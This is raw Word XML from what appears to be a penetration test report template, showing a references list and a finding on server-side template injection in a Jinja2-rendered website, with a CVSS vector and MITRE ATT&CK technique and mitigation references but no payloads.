    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2C851C3F" w14:textId="66D06197">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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04358766" w:rsidP="0D325B6E" w:rsidRDefault="04358766" w14:paraId="2AD06B90" w14:textId="565776C4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="04358766">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="538DF587">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2F1E319F" w:rsidP="0D325B6E" w:rsidRDefault="2F1E319F" w14:paraId="132D5400" w14:textId="438E6EC8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R800d1ff7fd074a24">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="2F1E319F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NIST Guidelines on Firewalls and Firewall Policy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5AB55892">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2EC707A3" w:rsidP="0D325B6E" w:rsidRDefault="2EC707A3" w14:paraId="14B6EF65" w14:textId="3DA44E72">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R203c91259c834dfd">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="2EC707A3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Phoenixnap - Configuring Firewall with UFW on U</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="5AB55892">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>buntu</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="3AAEA5E5" w:rsidP="0D325B6E" w:rsidRDefault="3AAEA5E5" w14:paraId="1A1FA579" w14:textId="1BBF3F13">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R7cfc6076360c4d11">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="3AAEA5E5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft - Firewall and Network Protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="06F1CC3E" w14:textId="54987893">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="599039B1" w14:textId="32A2B757">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7AEF0A5C" w:rsidP="0D325B6E" w:rsidRDefault="7AEF0A5C" w14:paraId="199ED357" w14:textId="7D6A6921">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1446676136" w:id="756593144"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7AEF0A5C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7AEF0A5C">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C1</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1702027808" w:id="1883282160"/>
      <w:bookmarkStart w:name="_Toc1867921645" w:id="1603373768"/>
      <w:bookmarkStart w:name="_Toc1749320995" w:id="1092157491"/>
      <w:bookmarkStart w:name="_Toc838266729" w:id="233160613"/>
      <w:bookmarkStart w:name="_Toc1139306550" w:id="463560245"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34E8479A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="34E8479A">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1122135990" w:id="101582406"/>
      <w:bookmarkStart w:name="_Toc1826090587" w:id="694023972"/>
      <w:bookmarkStart w:name="_Toc788547101" w:id="520813159"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6D6BA44D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server-Side</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="35DB5A46">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Template Injection </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="451B608D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="533B6862">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WEBSITE</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="451B608D">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="101582406"/>
      <w:bookmarkEnd w:id="694023972"/>
      <w:bookmarkEnd w:id="520813159"/>
      <w:bookmarkEnd w:id="1883282160"/>
      <w:bookmarkEnd w:id="1603373768"/>
      <w:bookmarkEnd w:id="1092157491"/>
      <w:bookmarkEnd w:id="233160613"/>
      <w:bookmarkEnd w:id="463560245"/>
      <w:bookmarkEnd w:id="756593144"/>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4CCDEB3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BAEABE" w14:textId="128D318F">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B295F7" w14:textId="4842138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C9FD6B3" w14:textId="79C407D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9F7F2C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076BCB0" w14:textId="59E9B17B">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BBE57FE" w14:textId="4CDBE88A">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692F2254" w:rsidP="0D325B6E" w:rsidRDefault="692F2254" w14:paraId="761D2E1E" w14:textId="1D600204">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692F2254">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>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F7CA6CA" w14:textId="5A5833C5">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3DF1A85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D867A2" w14:textId="0767407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62197F6" w14:textId="54207333">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9849B27"/>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EF75EFC"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2695BAC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1AE3EAC" w14:textId="434ECEB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B4A5C94" w:rsidP="0D325B6E" w:rsidRDefault="6B4A5C94" w14:paraId="0F7B568E" w14:textId="4A13B86F">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N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="Rd0c48dc008f64fa2">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6B4A5C94">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:N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AC:L</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AT:N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PR:N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UI:N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VC:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6B4A5C94">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6B4A5C94">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VI:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6B4A5C94">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6B4A5C94">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>VA:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6B4A5C94">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>H/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6B4A5C94">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>SC:N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SI:N</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6B4A5C94">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6B4A5C94">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0A184F68">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0AC8A5D" w14:textId="28D79F8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B654226" w:rsidP="0D325B6E" w:rsidRDefault="3B654226" w14:paraId="51D163E3" w14:textId="6E1A635B">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="3B654226">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1E5249F" w:rsidP="0D325B6E" w:rsidRDefault="31E5249F" w14:paraId="7889D464" w14:textId="17E02A4B">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R42d147304b9841b3">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="31E5249F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1059</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="01B4A7B0">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31E5249F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Command and Scripting Interpreter</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="53C265CF">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49614EC3"/>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328901F" w:rsidP="0D325B6E" w:rsidRDefault="0328901F" w14:paraId="5FE20C7B" w14:textId="4E7F9433">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="0328901F">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E5CA898" w:rsidP="0D325B6E" w:rsidRDefault="0E5CA898" w14:paraId="0A440CA8" w14:textId="28C88665">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163870bda678475e">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0E5CA898">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1038: Execution Prevention</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0E5CA898" w:rsidP="0D325B6E" w:rsidRDefault="0E5CA898" w14:paraId="6E333105" w14:textId="687ADCD9">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R0914e3e0f2fd4ef4">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0E5CA898">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1050: Exploit Protection</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="51FA6111" w:rsidP="0D325B6E" w:rsidRDefault="51FA6111" w14:paraId="587355C5" w14:textId="3C427DE6">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re7801f02fcd04778">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="51FA6111">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3E3D6A7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C954C83" w14:textId="4C1560B9">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9B0ED2D" w14:textId="5D82D668">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C2A9BC5" w14:textId="7552D600">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="451B608D" w:rsidP="0D325B6E" w:rsidRDefault="451B608D" w14:paraId="2B19980A" w14:textId="5CF03E3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51B608D" w:rsidP="0D325B6E" w:rsidRDefault="451B608D" w14:paraId="16257FC7" w14:textId="3D64613D">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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="451B608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The </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="451B608D">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 xml:space="preserve">affected </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3335ABE3">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website</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3335ABE3">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was found to </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not properly</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saniti</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ze user input when </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rendering</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with the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="60B772F0">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J</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3966001F">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inja2</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="396600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templating engine, making it</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3335ABE3">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vul</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0A1DE55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nerable to a Server-Side </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1428E604">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Templa</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="241E9298">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te Injection attack. This vulnerability allows an attacker to execute arbitrary </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5BF463BE">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P</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="241E9298">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ython</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="241E9298">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241E9298">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="241E9298">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on the website server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="56A12F51" w14:textId="3EC34756">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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="451B608D" w:rsidP="0D325B6E" w:rsidRDefault="451B608D" w14:paraId="660CBF89" w14:textId="686E957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51B608D" w:rsidP="0D325B6E" w:rsidRDefault="451B608D" w14:paraId="5A74560C" w14:textId="2773748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attacker </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03AF82E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to gain control of the website along with </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03AF82E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
